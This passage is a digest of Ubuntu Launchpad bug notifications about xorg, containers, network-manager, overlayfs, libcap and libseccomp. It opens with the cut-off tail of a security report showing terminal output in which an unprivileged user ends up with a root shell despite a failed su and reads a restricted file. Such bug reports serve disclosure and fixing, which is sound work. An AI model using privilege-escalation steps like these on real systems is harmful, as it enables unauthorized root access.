>   file is owned by UID 0 in the initial user namespace, which creates
>   some distracting error output but doesn't matter in this case.
>
>   nobody@ubuntu-xenial:~$ su root
>   su: Authentication failure
>   (Ignored)
>   bash: /root/.bashrc: Permission denied
>
>   # Supplementary groups have been dropped
>
>   root@ubuntu-xenial:~# id
>   uid=0(root) gid=0(root) groups=0(root)
>
>   # It can read the restricted file
>
>   root@ubuntu-xenial:~# cat /tmp/should_restrict
>   content
>
> To manage notifications about this bug go 

[Touch-packages] [Bug 1730019] [NEW] Mouse/pointer missing after resume from sleep

[serge rey]

Public bug reported:

After waking the machine up, I am no longer able to use the mouse as the
pointer does not respond. Only a hard reboot fixes this.

ProblemType: Bug
DistroRelease: Ubuntu 17.10
Package: xorg 1:7.7+19ubuntu3
ProcVersionSignature: Ubuntu 4.13.0-16.19-generic 4.13.4
Uname: Linux 4.13.0-16-generic x86_64
NonfreeKernelModules: wl
.tmp.unity_support_test.0:
 
ApportVersion: 2.20.7-0ubuntu3.1
Architecture: amd64
CompositorRunning: None
CurrentDesktop: ubuntu:GNOME
Date: Fri Nov  3 18:19:46 2017
DistUpgraded: Fresh install
DistroCodename: artful
DistroVariant: ubuntu
DkmsStatus: bcmwl, 6.30.223.271+bdcom, 4.13.0-16-generic, x86_64: installed
ExtraDebuggingInterest: Yes, including running git bisection searches
GraphicsCard:
 Intel Corporation HD Graphics 5300 [8086:161e] (rev 09) (prog-if 00 [VGA 
controller])
   Subsystem: Lenovo HD Graphics 5300 [17aa:3906]
InstallationDate: Installed on 2017-11-02 (1 days ago)
InstallationMedia: Ubuntu 17.10 "Artful Aardvark" - Release amd64 (20171018)
Lsusb:
 Bus 002 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub
 Bus 001 Device 004: ID 048d:8386 Integrated Technology Express, Inc. 
 Bus 001 Device 003: ID 5986:0535 Acer, Inc 
 Bus 001 Device 002: ID 0489:e07a Foxconn / Hon Hai 
 Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
MachineType: LENOVO 80HE
ProcEnviron:
 PATH=(custom, no user)
 XDG_RUNTIME_DIR=
 LANG=en_US.UTF-8
 SHELL=/bin/bash
ProcKernelCmdLine: BOOT_IMAGE=/vmlinuz-4.13.0-16-generic 
root=/dev/mapper/ubuntu--vg-root ro quiet splash vt.handoff=7
SourcePackage: xorg
Symptom: display
UpgradeStatus: No upgrade log present (probably fresh install)
dmi.bios.date: 08/06/2015
dmi.bios.vendor: LENOVO
dmi.bios.version: A6CN58WW
dmi.board.asset.tag: NO Asset Tag
dmi.board.name: VIUU4
dmi.board.vendor: LENOVO
dmi.board.version: SDK0J40709 WIN
dmi.chassis.asset.tag: NO Asset Tag
dmi.chassis.type: 10
dmi.chassis.vendor: LENOVO
dmi.chassis.version: Lenovo YOGA 3 Pro-1370
dmi.modalias: 
dmi:bvnLENOVO:bvrA6CN58WW:bd08/06/2015:svnLENOVO:pn80HE:pvrLenovoYOGA3Pro-1370:rvnLENOVO:rnVIUU4:rvrSDK0J40709WIN:cvnLENOVO:ct10:cvrLenovoYOGA3Pro-1370:
dmi.product.family: IDEAPAD
dmi.product.name: 80HE
dmi.product.version: Lenovo YOGA 3 Pro-1370
dmi.sys.vendor: LENOVO
version.compiz: compiz 1:0.9.13.1+17.10.20170901-0ubuntu1
version.libdrm2: libdrm2 2.4.83-1
version.libgl1-mesa-dri: libgl1-mesa-dri 17.2.2-0ubuntu1
version.libgl1-mesa-glx: libgl1-mesa-glx 17.2.2-0ubuntu1
version.xserver-xorg-core: xserver-xorg-core 2:1.19.5-0ubuntu2
version.xserver-xorg-input-evdev: xserver-xorg-input-evdev N/A
version.xserver-xorg-video-ati: xserver-xorg-video-ati 1:7.10.0-1
version.xserver-xorg-video-intel: xserver-xorg-video-intel 
2:2.99.917+git20170309-0ubuntu1
version.xserver-xorg-video-nouveau: xserver-xorg-video-nouveau 1:1.0.15-2

** Affects: xorg (Ubuntu)
 Importance: Undecided
 Status: New


** Tags: amd64 apport-bug artful ubuntu wayland-session

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to xorg in Ubuntu.
https://bugs.launchpad.net/bugs/1730019

Title:
  Mouse/pointer missing after resume from sleep

Status in xorg package in Ubuntu:
  New

Bug description:
  After waking the machine up, I am no longer able to use the mouse as
  the pointer does not respond. Only a hard reboot fixes this.

  ProblemType: Bug
  DistroRelease: Ubuntu 17.10
  Package: xorg 1:7.7+19ubuntu3
  ProcVersionSignature: Ubuntu 4.13.0-16.19-generic 4.13.4
  Uname: Linux 4.13.0-16-generic x86_64
  NonfreeKernelModules: wl
  .tmp.unity_support_test.0:
   
  ApportVersion: 2.20.7-0ubuntu3.1
  Architecture: amd64
  CompositorRunning: None
  CurrentDesktop: ubuntu:GNOME
  Date: Fri Nov  3 18:19:46 2017
  DistUpgraded: Fresh install
  DistroCodename: artful
  DistroVariant: ubuntu
  DkmsStatus: bcmwl, 6.30.223.271+bdcom, 4.13.0-16-generic, x86_64: installed
  ExtraDebuggingInterest: Yes, including running git bisection searches
  GraphicsCard:
   Intel Corporation HD Graphics 5300 [8086:161e] (rev 09) (prog-if 00 [VGA 
controller])
 Subsystem: Lenovo HD Graphics 5300 [17aa:3906]
  InstallationDate: Installed on 2017-11-02 (1 days ago)
  InstallationMedia: Ubuntu 17.10 "Artful Aardvark" - Release amd64 (20171018)
  Lsusb:
   Bus 002 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub
   Bus 001 Device 004: ID 048d:8386 Integrated Technology Express, Inc. 
   Bus 001 Device 003: ID 5986:0535 Acer, Inc 
   Bus 001 Device 002: ID 0489:e07a Foxconn / Hon Hai 
   Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
  MachineType: LENOVO 80HE
  ProcEnviron:
   PATH=(custom, no user)
   XDG_RUNTIME_DIR=
   LANG=en_US.UTF-8
   SHELL=/bin/bash
  ProcKernelCmdLine: BOOT_IMAGE=/vmlinuz-4.13.0-16-generic 
root=/dev/mapper/ubuntu--vg-root ro quiet splash vt.handoff=7
  SourcePackage: xorg
  Symptom: display
  UpgradeStatus: No upgrade log present (probably fresh install)
  dmi.bios.date: 08/06/2015
  

[Touch-packages] [Bug 1668724] Re: fails to mount cgroupfs inside containers running on 16.04

[Serge Hallyn]

Drat.  I do think this should still be pushed.  I don't know when I'll
have time to do it though.  Please keep it open.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to cgroup-lite in Ubuntu.
https://bugs.launchpad.net/bugs/1668724

Title:
  fails to mount cgroupfs inside containers running on 16.04

Status in cgroup-lite package in Ubuntu:
  Fix Released
Status in cgroup-lite source package in Precise:
  Won't Fix
Status in cgroup-lite source package in Trusty:
  Incomplete
Status in cgroup-lite source package in Xenial:
  Incomplete
Status in cgroup-lite source package in Yakkety:
  Won't Fix

Bug description:
  I need to run nested Ubuntu 12.04 and 14.04 containers on 16.04 hosts,
  and have noticed that the cgroups-mount script for mounting the
  cgroups inside the containers has stopped working. This is because
  systemd now comounts multiple controllers on a single hierarchy, which
  prevents mounting them individually inside the container.

  ===  SRU Justification 
  Impact: nested containers fail to start
  Reproduce:  create a root owned container;  install lxc and cgroup-lite;  
create a container, and try to start it.  Starting will fail if cgroup-lite is 
running in the first level container without this patch.
  Regression potential:  should be low, it's possible that the regexp is simply 
wrong for some cases.
  ===

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/cgroup-lite/+bug/1668724/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1668724] Re: fails to mount cgroupfs inside containers running on 16.04

[Serge Hallyn]

I'll still aim to push this for trusty and xenial.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to cgroup-lite in Ubuntu.
https://bugs.launchpad.net/bugs/1668724

Title:
  fails to mount cgroupfs inside containers running on 16.04

Status in cgroup-lite package in Ubuntu:
  Fix Released
Status in cgroup-lite source package in Precise:
  Won't Fix
Status in cgroup-lite source package in Trusty:
  Incomplete
Status in cgroup-lite source package in Xenial:
  Incomplete
Status in cgroup-lite source package in Yakkety:
  Won't Fix

Bug description:
  I need to run nested Ubuntu 12.04 and 14.04 containers on 16.04 hosts,
  and have noticed that the cgroups-mount script for mounting the
  cgroups inside the containers has stopped working. This is because
  systemd now comounts multiple controllers on a single hierarchy, which
  prevents mounting them individually inside the container.

  ===  SRU Justification 
  Impact: nested containers fail to start
  Reproduce:  create a root owned container;  install lxc and cgroup-lite;  
create a container, and try to start it.  Starting will fail if cgroup-lite is 
running in the first level container without this patch.
  Regression potential:  should be low, it's possible that the regexp is simply 
wrong for some cases.
  ===

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/cgroup-lite/+bug/1668724/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 737615] Re: Can't save changes in "Edit Connections..." for Wi-Fi networks to which one doesn't have the password

[Serge]

*** This bug is a duplicate of bug 1409866 ***
https://bugs.launchpad.net/bugs/1409866

The problem is in the settings of the connection, but unfortunates the
manager does not display this information.


SOLUTION:
- start nm-connection-editor from the terminal (sudo is possible, bus probably 
not necessary). 
- open the connection settings as usual in the popped-up manager
- The exact error message will be printed in the terminal, read it. 
- Fix the error and the buttons will be available again.


EXAMPLE OUTPUT in the terminal (in German in my case and I had to mark
Certificate as ignored ):

** Message: Cannot save connection due to error: Editors wird initialisiert …
** Message: Cannot save connection due to error: ungültige Einstellung 
Sicherheit des Funknetzwerks: Ungültiges EAP-PEAP-CA-Zertifikat: Kein 
Zertifikat angegeben
** Message: Cannot save connection due to error: ungültige Einstellung 
IPv4-Einstellungen: ipv4.addresses: Diese Eigenschaft darf nicht für 
»method=manual« leer sein

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to network-manager in Ubuntu.
https://bugs.launchpad.net/bugs/737615

Title:
  Can't save changes in "Edit Connections..." for Wi-Fi networks to
  which one doesn't have the password

Status in Linux:
  Unknown
Status in NetworkManager:
  Unknown
Status in network-manager package in Ubuntu:
  Confirmed
Status in network-manager package in Debian:
  New

Bug description:
  Binary package hint: network-manager

  Steps to reproduce:
  1) Right-click on Network Manager's tray icon
  2) select "edit connections"
  3) go to the "wireless" tab
  4) select any connection in the list, except the one you are currently 
connected to
  5) Click "Edit"
  5) Change some settings

  Expected: there should be some way to save those changes

  Observed: the "Apply" button is greyed out. There is no "Save" button.
  If you hit Cancel, obviously the changes are discarded.

  If you edit the network you are connected to, the Apply button works,
  but why on earth are'n you allowed to save changes to a network you
  are not connected to? And if there was a reason why you can't, then
  why are you allowed to edit in the first place?

  ProblemType: Bug
  DistroRelease: Ubuntu 10.04
  Package: network-manager 0.8-0ubuntu3
  ProcVersionSignature: Ubuntu 2.6.32-29.58-generic 2.6.32.28+drm33.13
  Uname: Linux 2.6.32-29-generic i686
  NonfreeKernelModules: nvidia
  Architecture: i386
  CRDA: Error: [Errno 2] No such file or directory
  Date: Fri Mar 18 14:47:06 2011
  IfupdownConfig:
   auto lo
   iface lo inet loopback
  InstallationMedia: Ubuntu 10.04 LTS "Lucid Lynx" - Release i386 (20100429)
  IpRoute:
   192.168.2.0/24 dev wlan0  proto kernel  scope link  src 192.168.2.105  
metric 2 
   169.254.0.0/16 dev wlan0  scope link  metric 1000 
   default via 192.168.2.1 dev wlan0  proto static
  Keyfiles: Error: [Errno 2] No such file or directory
  ProcEnviron:
   PATH=(custom, no user)
   LANG=en_US.utf8
   SHELL=/bin/bash
  SourcePackage: network-manager

To manage notifications about this bug go to:
https://bugs.launchpad.net/linux/+bug/737615/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 882147] Re: overlayfs does not implement inotify interfaces correctly

[Serge Hallyn]

Nope, tail -f is still broken at least in 4.12.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to coreutils in Ubuntu.
https://bugs.launchpad.net/bugs/882147

Title:
  overlayfs does not implement inotify interfaces correctly

Status in coreutils package in Ubuntu:
  In Progress
Status in linux package in Ubuntu:
  Triaged
Status in coreutils source package in Precise:
  Confirmed
Status in linux source package in Precise:
  Triaged

Bug description:
  When using tail on the liveCD some updates are not reported.  This
  seems to be triggered by tail using inotify to identify modified
  files.  Overlayfs does not appear to be implementing inotify quite the
  way you might hope reporting only against the underlying filesystems.

  Related bugs:
   * bug 1213925:  upstart should notice "/etc" inode change

  ProblemType: Bug
  DistroRelease: Ubuntu 11.10
  Package: linux-image-3.0.0-12-generic 3.0.0-12.20
  ProcVersionSignature: Ubuntu 3.0.0-12.20-generic 3.0.4
  Uname: Linux 3.0.0-12-generic x86_64
  AlsaVersion: Advanced Linux Sound Architecture Driver Version 1.0.24.
  ApportVersion: 1.23-0ubuntu3
  Architecture: amd64
  ArecordDevices:
    List of CAPTURE Hardware Devices 
   card 0: Intel [HDA Intel], device 0: STAC92xx Analog [STAC92xx Analog]
     Subdevices: 0/1
     Subdevice #0: subdevice #0
  AudioDevicesInUse:
   USERPID ACCESS COMMAND
   /dev/snd/controlC0:  apw2296 F pulseaudio
   /dev/snd/pcmC0D0c:   apw2296 F...m pulseaudio
   /dev/snd/pcmC0D0p:   apw2296 F...m pulseaudio
  Card0.Amixer.info:
   Card hw:0 'Intel'/'HDA Intel at 0xfc70 irq 47'
     Mixer name : 'Intel Cantiga HDMI'
     Components : 'HDA:111d7675,1028029f,00100103 
HDA:80862802,80860101,0010'
     Controls  : 20
     Simple ctrls  : 11
  Date: Wed Oct 26 17:46:16 2011
  EcryptfsInUse: Yes
  HibernationDevice: RESUME=UUID=d8328455-deac-4bae-877d-c408d371cefe
  MachineType: Dell Inc. Studio 1537
  ProcEnviron:
   PATH=(custom, user)
   LANG=en_GB.UTF-8
   SHELL=/bin/bash
  ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-3.0.0-12-generic 
root=UUID=cf503727-25f2-4ecd-b0f3-2b894523bcba ro quiet splash vt.handoff=7
  RelatedPackageVersions:
   linux-restricted-modules-3.0.0-12-generic N/A
   linux-backports-modules-3.0.0-12-generic  N/A
   linux-firmware1.60
  SourcePackage: linux
  UpgradeStatus: Upgraded to oneiric on 2011-10-17 (9 days ago)
  WpaSupplicantLog:

  dmi.bios.date: 09/22/2008
  dmi.bios.vendor: Dell Inc.
  dmi.bios.version: A03
  dmi.board.vendor: Dell Inc.
  dmi.board.version: A03
  dmi.chassis.type: 8
  dmi.chassis.vendor: Dell Inc.
  dmi.chassis.version: A03
  dmi.modalias: 
dmi:bvnDellInc.:bvrA03:bd09/22/2008:svnDellInc.:pnStudio1537:pvrA03:rvnDellInc.:rn:rvrA03:cvnDellInc.:ct8:cvrA03:
  dmi.product.name: Studio 1537
  dmi.product.version: A03
  dmi.sys.vendor: Dell Inc.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/coreutils/+bug/882147/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 882147] Re: overlayfs does not implement inotify interfaces correctly

[Serge Hallyn]

I've seen reports that this is fixed in 4.10?

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to coreutils in Ubuntu.
https://bugs.launchpad.net/bugs/882147

Title:
  overlayfs does not implement inotify interfaces correctly

Status in coreutils package in Ubuntu:
  In Progress
Status in linux package in Ubuntu:
  Triaged
Status in coreutils source package in Precise:
  Confirmed
Status in linux source package in Precise:
  Triaged

Bug description:
  When using tail on the liveCD some updates are not reported.  This
  seems to be triggered by tail using inotify to identify modified
  files.  Overlayfs does not appear to be implementing inotify quite the
  way you might hope reporting only against the underlying filesystems.

  Related bugs:
   * bug 1213925:  upstart should notice "/etc" inode change

  ProblemType: Bug
  DistroRelease: Ubuntu 11.10
  Package: linux-image-3.0.0-12-generic 3.0.0-12.20
  ProcVersionSignature: Ubuntu 3.0.0-12.20-generic 3.0.4
  Uname: Linux 3.0.0-12-generic x86_64
  AlsaVersion: Advanced Linux Sound Architecture Driver Version 1.0.24.
  ApportVersion: 1.23-0ubuntu3
  Architecture: amd64
  ArecordDevices:
    List of CAPTURE Hardware Devices 
   card 0: Intel [HDA Intel], device 0: STAC92xx Analog [STAC92xx Analog]
     Subdevices: 0/1
     Subdevice #0: subdevice #0
  AudioDevicesInUse:
   USERPID ACCESS COMMAND
   /dev/snd/controlC0:  apw2296 F pulseaudio
   /dev/snd/pcmC0D0c:   apw2296 F...m pulseaudio
   /dev/snd/pcmC0D0p:   apw2296 F...m pulseaudio
  Card0.Amixer.info:
   Card hw:0 'Intel'/'HDA Intel at 0xfc70 irq 47'
     Mixer name : 'Intel Cantiga HDMI'
     Components : 'HDA:111d7675,1028029f,00100103 
HDA:80862802,80860101,0010'
     Controls  : 20
     Simple ctrls  : 11
  Date: Wed Oct 26 17:46:16 2011
  EcryptfsInUse: Yes
  HibernationDevice: RESUME=UUID=d8328455-deac-4bae-877d-c408d371cefe
  MachineType: Dell Inc. Studio 1537
  ProcEnviron:
   PATH=(custom, user)
   LANG=en_GB.UTF-8
   SHELL=/bin/bash
  ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-3.0.0-12-generic 
root=UUID=cf503727-25f2-4ecd-b0f3-2b894523bcba ro quiet splash vt.handoff=7
  RelatedPackageVersions:
   linux-restricted-modules-3.0.0-12-generic N/A
   linux-backports-modules-3.0.0-12-generic  N/A
   linux-firmware1.60
  SourcePackage: linux
  UpgradeStatus: Upgraded to oneiric on 2011-10-17 (9 days ago)
  WpaSupplicantLog:

  dmi.bios.date: 09/22/2008
  dmi.bios.vendor: Dell Inc.
  dmi.bios.version: A03
  dmi.board.vendor: Dell Inc.
  dmi.board.version: A03
  dmi.chassis.type: 8
  dmi.chassis.vendor: Dell Inc.
  dmi.chassis.version: A03
  dmi.modalias: 
dmi:bvnDellInc.:bvrA03:bd09/22/2008:svnDellInc.:pnStudio1537:pvrA03:rvnDellInc.:rn:rvrA03:cvnDellInc.:ct8:cvrA03:
  dmi.product.name: Studio 1537
  dmi.product.version: A03
  dmi.sys.vendor: Dell Inc.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/coreutils/+bug/882147/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1700814] Re: Default capability of cap_setfcap+i should be set on setcap

[Serge Hallyn]

Indeed it should be reasonable to do so.  Note that there are cases,
including unprivileged containers, where file capabilities cannot be
set, so the packaging would have to gracefully handle (i.e. ignore) that
failure rather than fail the package install.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to libcap2 in Ubuntu.
https://bugs.launchpad.net/bugs/1700814

Title:
  Default capability of cap_setfcap+i should be set on setcap

Status in libcap2 package in Ubuntu:
  New

Bug description:
  If I grant a user (via pam_cap) cap_setfcap+i, I would then expect
  them to be able to use setcap without sudo. setcap is not provided
  with any default file capabilities however, so either the user has to
  sudo, or I have to grant the setfcap capability to setcap with setcap.

  In my mind, it would be reasonable to grant setfcap+i to setcap by
  default on installation.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/libcap2/+bug/1700814/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1700812] Re: pam_cap is provided by the libpam-cap package on x86_64 xenial

[Serge Hallyn]

@mattofak - thanks for filing the bug.  I've linked it to the manpage
project.  It'll get fixed.

** Also affects: ubuntu-manpage-repository
   Importance: Undecided
   Status: New

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to libcap2 in Ubuntu.
https://bugs.launchpad.net/bugs/1700812

Title:
  pam_cap is provided by the libpam-cap package on x86_64 xenial

Status in Ubuntu Manpage Repository:
  New
Status in libcap2 package in Ubuntu:
  New

Bug description:
  The man page for pam_cap
  (http://manpages.ubuntu.com/manpages/xenial/man8/pam_cap.8.html)
  claims that it is provided by the libcap2-bin package. This is
  incorrect, it is actually provided by the libpam-cap package (which is
  recommended by libcap2-bin.)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu-manpage-repository/+bug/1700812/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

Re: [Touch-packages] [Bug 1700812] [NEW] pam_cap is provided by the libpam-cap package on x86_64 xenial

[Serge Hallyn]

Note, the actual manpage makes no mention of the package.  Which is
how it should be, as the manpage comes from upstream and not from
Ubuntu.

So if this is a bug, it is a bug against manpages.ubuntu.com.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to libcap2 in Ubuntu.
https://bugs.launchpad.net/bugs/1700812

Title:
  pam_cap is provided by the libpam-cap package on x86_64 xenial

Status in libcap2 package in Ubuntu:
  New

Bug description:
  The man page for pam_cap
  (http://manpages.ubuntu.com/manpages/xenial/man8/pam_cap.8.html)
  claims that it is provided by the libcap2-bin package. This is
  incorrect, it is actually provided by the libpam-cap package (which is
  recommended by libcap2-bin.)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/libcap2/+bug/1700812/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1696989] Re: package libpam-cgfs 2.0.7-0ubuntu1~17.04.1 failed to install/upgrade: subprocess installed post-installation script returned error exit status 128

[Serge Hallyn]

Hi,

thanks for taking the time to report this bug.

This actually appears to be a problem not in libpam-cgfs itself:

Setting up libpam-cgfs (2.0.7-0ubuntu1~17.04.1) ...
Use of uninitialized value $reply in scalar chomp at 
/usr/share/perl5/Debconf/FrontEnd/Passthrough.pm line 66.

I'm going to mark this as affecting debconf, though the error message
looks like a duplicate of a supposedly resolved bug.  Can you please
show the result of


dpkg -l | grep debconf
cat /etc/*-release

so we can check the versions?


** Also affects: debconf (Ubuntu)
   Importance: Undecided
   Status: New

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to debconf in Ubuntu.
https://bugs.launchpad.net/bugs/1696989

Title:
  package libpam-cgfs 2.0.7-0ubuntu1~17.04.1 failed to install/upgrade:
  subprocess installed post-installation script returned error exit
  status 128

Status in debconf package in Ubuntu:
  New
Status in lxcfs package in Ubuntu:
  New

Bug description:
  Error occurred while updating from terminal:
  W: APT had planned for dpkg to do more than it reported back (40 vs 44).
 Affected packages: libpam-cgfs:amd64

  ProblemType: Package
  DistroRelease: Ubuntu 17.04
  Package: libpam-cgfs 2.0.7-0ubuntu1~17.04.1
  ProcVersionSignature: Ubuntu 4.10.0-22.24-generic 4.10.15
  Uname: Linux 4.10.0-22-generic x86_64
  ApportVersion: 2.20.4-0ubuntu4.1
  Architecture: amd64
  Date: Fri Jun  9 14:49:06 2017
  ErrorMessage: subprocess installed post-installation script returned error 
exit status 128
  InstallationDate: Installed on 2017-03-16 (84 days ago)
  InstallationMedia: Ubuntu 16.10 "Yakkety Yak" - Release amd64 (20161012.2)
  RelatedPackageVersions:
   dpkg 1.18.10ubuntu2
   apt  1.4
  SourcePackage: lxcfs
  Title: package libpam-cgfs 2.0.7-0ubuntu1~17.04.1 failed to install/upgrade: 
subprocess installed post-installation script returned error exit status 128
  UpgradeStatus: Upgraded to zesty on 2017-04-18 (52 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/debconf/+bug/1696989/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

Re: [Touch-packages] [Bug 1695808] Re: tasks killed for nop (-1)

[Serge Hallyn]

Note, I'm happy to update a fix for this for a (and a -proposed one
for xenial).

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to libseccomp in Ubuntu.
https://bugs.launchpad.net/bugs/1695808

Title:
  tasks killed for nop (-1)

Status in libseccomp package in Ubuntu:
  Confirmed

Bug description:
  As the seccomp manpage points out, after seeing a SECCOMP_RET_TRACE, a
  tracer can set nr to -1 to skip the syscall. Similarly, one task could
  be debugging another seccomp'd task, simply doing PTRACE_SYSCALL
  without using SECCOMP_PTRACE, and want to make the tracee skip a
  syscall by setting nr to -1.

  However, the way libseccomp checks for X86_SYSCALL_BIT wrongly catches
  nr == -1. This kills any application using -1 to skip a syscall.  This
  means that any such application running under lxd, which uses
  libseccomp to set its seccomp policies, fails.

  libseccomp upstream has been fixed, see
  https://github.com/seccomp/libseccomp/issues/80 .  Ideally this fix
  would be cherrypicked into both artful and xenial.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/libseccomp/+bug/1695808/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1695808] [NEW] tasks killed for nop (-1)

[Serge Hallyn]

Public bug reported:

As the seccomp manpage points out, after seeing a SECCOMP_RET_TRACE, a
tracer can set nr to -1 to skip the syscall. Similarly, one task could
be debugging another seccomp'd task, simply doing PTRACE_SYSCALL without
using SECCOMP_PTRACE, and want to make the tracee skip a syscall by
setting nr to -1.

However, the way libseccomp checks for X86_SYSCALL_BIT wrongly catches
nr == -1. This kills any application using -1 to skip a syscall.  This
means that any such application running under lxd, which uses libseccomp
to set its seccomp policies, fails.

libseccomp upstream has been fixed, see
https://github.com/seccomp/libseccomp/issues/80 .  Ideally this fix
would be cherrypicked into both artful and xenial.

** Affects: libseccomp (Ubuntu)
 Importance: Undecided
 Status: New

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to libseccomp in Ubuntu.
https://bugs.launchpad.net/bugs/1695808

Title:
  tasks killed for nop (-1)

Status in libseccomp package in Ubuntu:
  New

Bug description:
  As the seccomp manpage points out, after seeing a SECCOMP_RET_TRACE, a
  tracer can set nr to -1 to skip the syscall. Similarly, one task could
  be debugging another seccomp'd task, simply doing PTRACE_SYSCALL
  without using SECCOMP_PTRACE, and want to make the tracee skip a
  syscall by setting nr to -1.

  However, the way libseccomp checks for X86_SYSCALL_BIT wrongly catches
  nr == -1. This kills any application using -1 to skip a syscall.  This
  means that any such application running under lxd, which uses
  libseccomp to set its seccomp policies, fails.

  libseccomp upstream has been fixed, see
  https://github.com/seccomp/libseccomp/issues/80 .  Ideally this fix
  would be cherrypicked into both artful and xenial.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/libseccomp/+bug/1695808/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1690820] Re: killing su does not kill subprocess (SIGTERM not propagated)

[Serge Hallyn]

Thanks for filing, Radu.

The commit which fixed it is in this PR:

https://github.com/shadow-maint/shadow/pull/72

(wget https://github.com/shadow-maint/shadow/pull/72.patch)

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to shadow in Ubuntu.
https://bugs.launchpad.net/bugs/1690820

Title:
  killing su does not kill subprocess (SIGTERM not propagated)

Status in shadow package in Ubuntu:
  New

Bug description:
  Problem first appeared in login_4.1.5.1-1ubuntu9.4 and version
  login_4.1.5.1-1ubuntu9.2 was not affected.


  
  Example where the subprocess 115576 has not been terminated:
  root@ubuntu:~/sudebug/src/shadow-4.1.5.1/src# pkill sleep; ./su test -c 
'sleep '&
  [1] 115575
  root@ubuntu:~/sudebug/src/shadow-4.1.5.1/src# kill $!
  root@ubuntu:~/sudebug/src/shadow-4.1.5.1/src#  ...waiting for child to 
terminate.
  pgrep sleep
  115576
  [1]+  Exit 255./su test -c 'sleep '
  root@ubuntu:~/sudebug/src/shadow-4.1.5.1/src# pgrep sleep
  115576

  Expected behavior:
  root@ubuntu:~/sudebug/src/shadow-4.1.5.1/src# pkill sleep; ./su test -c 
'sleep ' &
  [1] 115503
  root@ubuntu:~/sudebug/src/shadow-4.1.5.1/src# kill $!
  root@ubuntu:~/sudebug/src/shadow-4.1.5.1/src#
  Session terminated, terminating shell... ...terminated.
   ...terminated.

  [1]+  Exit 143./su test -c 'sleep '
  root@ubuntu:~/sudebug/src/shadow-4.1.5.1/src# pgrep sleep

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1690820/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1649310] Re: RM Upstart, obsolete, superseded by systemd

[Serge Hallyn]

@bryanquigley - no.  i had opened one for networkmanager (or planned on
